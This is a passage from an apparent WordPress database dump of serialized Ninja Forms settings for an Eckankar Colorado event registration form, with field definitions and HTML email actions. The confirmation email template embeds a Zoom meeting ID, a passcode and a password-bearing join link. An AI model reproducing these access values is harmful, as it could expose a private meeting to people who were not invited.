:\"settings\";a:25:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"3\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:10:\"First Name\";s:3:\"key\";s:9:\"firstname\";s:4:\"type\";s:9:\"firstname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:9:\"firstname\";s:21:\"custom_name_attribute\";s:5:\"fname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:10:\"manual_key\";b:1;s:14:\"drawerDisabled\";b:0;}}i:418;a:1:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"4\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:9:\"Last Name\";s:3:\"key\";s:8:\"lastname\";s:4:\"type\";s:8:\"lastname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:8:\"lastname\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}}i:419;a:1:{s:8:\"settings\";a:23:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"5\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:5:\"Email\";s:3:\"key\";s:5:\"email\";s:4:\"type\";s:5:\"email\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:5:\"email\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}}i:420;a:1:{s:8:\"settings\";a:15:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"9\";s:11:\"idAttribute\";s:2:\"id\";s:14:\"drawerDisabled\";s:0:\"\";s:5:\"label\";s:6:\"Submit\";s:3:\"key\";s:20:\"submit_1618628929218\";s:4:\"type\";s:6:\"submit\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:16:\"processing_label\";s:10:\"Processing\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:20:\"submit_1618628929218\";}}}s:7:\"actions\";a:4:{i:179;a:1:{s:8:\"settings\";a:34:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-04-18 18:46:01\";s:5:\"label\";s:16:\"Store Submission\";s:9:\"parent_id\";s:2:\"44\";s:10:\"attach_csv\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:3:\"tag\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:16:\"payment_gateways\";s:0:\"\";s:5:\"order\";s:1:\"3\";s:10:\"editActive\";b:0;s:12:\"objectDomain\";s:7:\"actions\";s:14:\"drawerDisabled\";s:0:\"\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";s:16:\"subs_expire_time\";s:2:\"90\";s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"exception_fields\";a:0:{}s:18:\"fields-save-toggle\";s:8:\"save_all\";s:15:\"submitter_email\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:10:\"objectType\";s:6:\"Action\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}}i:182;a:1:{s:8:\"settings\";a:34:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-04-18 18:46:01\";s:5:\"label\";s:15:\"Success Message\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:7:\"message\";s:42:\"Your form has been successfully submitted.\";s:5:\"order\";s:1:\"1\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:116:\"<p>Thank you for registering for our event!</p><p>You Will receive an email with the Zoom Login information.<br></p>\";s:9:\"parent_id\";s:2:\"44\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";}}i:181;a:1:{s:8:\"settings\";a:28:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-04-18 18:46:01\";s:5:\"label\";s:24:\"Admin Email Notification\";s:8:\"reply_to\";s:13:\"{field:email}\";s:12:\"from_address\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:13:\"email_message\";s:3073:\"<div class=\"boldgrid-section color1-background-color color-1-text-contrast bg-background-color\"><div class=\"container\"><div class=\"\" style=\"padding-top: 0; padding-bottom: 0px;\"><div class=\"col-md-12 col-sm-12 col-xs-12\"><p class=\"\"><span style=\"font-size: 42px; font-weight: bold;\"><img class=\"alignnone wp-image-262315 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/12/email-img-registration-600-3.jpg\" alt=\"\" width=\"600\" height=\"238\"></span></p></div></div><div class=\"row\" style=\"padding: 0px 12px 12px; background-color: #efefef; border: 1px solid #cccccc;\"><div class=\"col-md-12 col-sm-12 col-xs-12\"><p class=\"\"><span style=\"color: #333333; font-size: 23px;\">Hello {first},</span></p><p class=\"\"><span style=\"color: #333333; font-size: 20px;\">Thank You For Registering for our Zoom Event! <br></span></p><p class=\"\"><span style=\"color: #333333; font-size: 18px;\">You are signed up for the \"<span style=\"font-weight: bold; color: #23507d;\">{event-title}</span>\" </span><span style=\"color: #333333; font-size: 18px;\">on <span style=\"font-weight: bold; color: #23507d;\">{event-date}</span> at <span style=\"font-weight: bold; color: #23507d;\">10:30 AM to 11:30 AM.</span></span></p><div style=\"color: #333333;\"><p class=\"\"><span style=\"color: #333333; font-size: 18px;\"><b>For those of you joining with the Zoom App:<br></b><span style=\"color: #800000;\"><b>Meeting ID:</b></span> 891 2510 3432 <br><b><span style=\"color: #800000;\">Passcode</span>:</b> 162109 </span></p><p><b><span style=\"color: #333333; font-size: 18px;\">Join Zoom Meeting from a web browser:</span></b><br><span style=\"color: #333333; font-size: 18px;\"><a href=\"https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09\" rel=\"noopener noreferrer\">https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09</a></span></p><p class=\"\"><span style=\"color: #333333; font-size: 18px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. <strong>Please note that Zoom works best if you download the app. It is more stable and has more functions. Select “use computer audio” for sound.</strong></span></p><p><span style=\"color: #333333; font-size: 18px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</span></p></div><p class=\"\"><span style=\"color: #333333; font-size: 18px;\"><em>See you there!</em></span></p></div></div></div></div><div class=\"boldgrid-section color1-background-color color-1-text-contrast bg-background-color\" style=\"background-color: #f5e3c4;\"><div class=\"container\"><div class=\"row\" style=\"padding: 9px; background-color: #f5e3c4;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\"><span style=\"color: #5e5e5e; font-size: 16px;\">If you have any questions regarding the origin of this form, please feel free to contact the <a href=\"https://eckankar-colorado.org\">Eckankar In Colorado</a> webmaster: webmaster@eckankar-colorado.org</span></p></div></div></div></div>\";s:13:\"email_subject\";s:62:\"New Event Registration from {field:firstname} {field:lastname}\";s:3:\"tag\";s:0:\"\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:7:\"message\";s:18:\"{all_fields_table}\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:10:\"editActive\";b:0;s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:14:\"drawerDisabled\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:9:\"parent_id\";s:2:\"44\";s:19:\"email_message_plain\";s:0:\"\";}}i:180;a:1:{s:8:\"settings\";a:28:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-04-18 18:46:01\";s:5:\"label\";s:23:\"User Email Confirmation\";s:14:\"drawerDisabled\";s:0:\"\";s:9:\"parent_id\";s:2:\"44\";s:19:\"email_message_plain\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:12:\"from_address\";s:20:\"{system:admin_email}\";s:9:\"from_name\";s:0:\"\";s:12:\"objectDomain\";s:7:\"actions\";s:2:\"to\";s:13:\"{field:email}\";s:10:\"editActive\";b:0;s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:10:\"objectType\";s:6:\"Action\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:7:\"message\";s:18:\"{all_fields_table}\";s:16:\"payment_gateways\";s:0:\"\";s:5:\"order\";s:1:\"2\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:39:\"Thank you for registering for our event\";s:13:\"email_message\";s:94:\"<p>Thanks bunches!</p><p>Your registration details are below:</p><p>{all_fields_table}<br></p>\";}}}}'),(1633,2,'meta-box-order_mec-events','a:3:{s:4:\"side\";s:111:\"submitdiv,mec_metabox_label,mec_categorydiv,tagsdiv-post_tag,mec_metabox_color,postimagediv,wpXSG-meta,passster\";s:6:\"normal\";s:98:\"commentstatusdiv,postexcerpt,slugdiv,authordiv,mec_metabox_details,mec_metabox_booking,commentsdiv\";s:8:\"advanced\";s:23:\"wpcode-metabox-snippets\";}'),(1634,2,'screen_layout_mec-events','2'),(1635,2,'closedpostboxes_mec-events','a:2:{i:0;s:17:\"mec_metabox_color\";i:1;s:23:\"wpcode-metabox-snippets\";}'),(1636,2,'metaboxhidden_mec-events','a:8:{i:0;s:17:\"mec_metabox_color\";i:1;s:10:\"wpXSG-meta\";i:2;s:8:\"passster\";i:3;s:16:\"commentstatusdiv\";i:4;s:11:\"postexcerpt\";i:5;s:7:\"slugdiv\";i:6;s:9:\"authordiv\";i:7;s:23:\"wpcode-metabox-snippets\";}'),(1648,2,'wpcl_nf_form_preview_47','a:4:{s:2:\"id\";i:47;s:8:\"settings\";a:25:{s:5:\"title\";s:18:\"Event Registration\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:10:\"form_title\";s:18:\"Event Registration\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"1\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:7:\"seq_num\";N;s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";s:0:\"\";s:3:\"key\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"add_submit\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:13:{i:0;s:23:\"event_intro_description\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:7:\"textbox\";i:6;s:4:\"hr_1\";i:7;s:37:\"how_many_friends_will_you_bring_along\";i:8;s:21:\"any_food_requirements\";i:9;s:15:\"preferred_drink\";i:10;s:4:\"hr_2\";i:11;s:4:\"html\";i:12;s:8:\"register\";}s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:20:\"repeatable_fieldsets\";s:0:\"\";}s:6:\"fields\";a:13:{i:430;a:1:{s:8:\"settings\";a:15:{s:4:\"type\";s:4:\"html\";s:3:\"key\";s:23:\"event_intro_description\";s:5:\"label\";s:23:\"Event Intro Description\";s:5:\"order\";s:1:\"1\";s:10:\"editActive\";b:0;s:12:\"objectDomain\";s:6:\"fields\";s:10:\"objectType\";s:5:\"Field\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:7:\"default\";s:240:\"<p>If you would like to take part in our event, please fill in your details in this Event Registration Form below and you will be automatically registered. Event registration must be completed at least seven (7) days prior to the event.</p>\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:23:\"Event Intro Description\";s:9:\"field_key\";s:23:\"event_intro_description\";s:9:\"parent_id\";s:2:\"47\";s:11:\"idAttribute\";s:2:\"id\";}}i:431;a:1:{s:8:\"settings\";a:14:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"2\";s:5:\"label\";s:7:\"Divider\";s:3:\"key\";s:2:\"hr\";s:4:\"type\";s:2:\"hr\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:2:\"hr\";s:9:\"parent_id\";s:2:\"47\";s:11:\"idAttribute\";s:2:\"id\";}}i:432;a:1:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"3\";s:5:\"label\";s:10:\"First Name\";s:3:\"key\";s:9:\"firstname\";s:4:\"type\";s:9:\"firstname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:9:\"firstname\";s:21:\"custom_name_attribute\";s:5:\"fname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:9:\"parent_id\";s:2:\"47\";s:11:\"idAttribute\";s:2:\"id\";}}i:433;a:1:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"4\";s:5:\"label\";s:9:\"Last Name\";s:3:\"key\";s:8:\"lastname\";s:4:\"type\";s:8:\"lastname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:8:\"lastname\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:9:\"parent_id\";s:2:\"47\";s:11:\"idAttribute\";s:2:\"id\";}}i:434;a:1:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"5\";s:5:\"label\";s:5:\"Email\";s:3:\"key\";s:5:\"email\";s:4:\"type\";s:5:\"email\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:5:\"email\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:9:\"parent_id\";s:2:\"47\";s:11:\"idAttribute\";s:2:\"id\";}}i:435;a:1:{s:8:\"settings\";a:32:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"6\";s:5:\"label\";s:5:\"Phone\";s:3:\"key\";s:7:\"textbox\";s:4:\"type\";s:7:\"textbox\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:13:\"element_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:13:\"disable_input\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"disable_browser_autocomplete\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:7:\"textbox\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";s:9:\"parent_id\";s:2:\"47\";s:11:\"idAttribute\";s:2:\"id\";}}i:436;a:1:{s:8:\"settings\";a:14:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"7\";s:5:\"label\";s:7:\"Divider\";s:3:\"key\";s:4:\"hr_1\";s:4:\"type\";s:2:\"hr\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:4:\"hr_1\";s:9:\"parent_id\";s:2:\"47\";s:11:\"idAttribute\";s:2:\"id\";}}i:437;a:1:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"8\";s:5:\"label\";s:38:\"How many friends will you bring along?\";s:3:\"key\";s:37:\"how_many_friends_will_you_bring_along\";s:4:\"type\";s:10:\"listselect\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:5:{i:0;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:4:\"None\";s:5:\"value\";s:4:\"none\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"3\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons 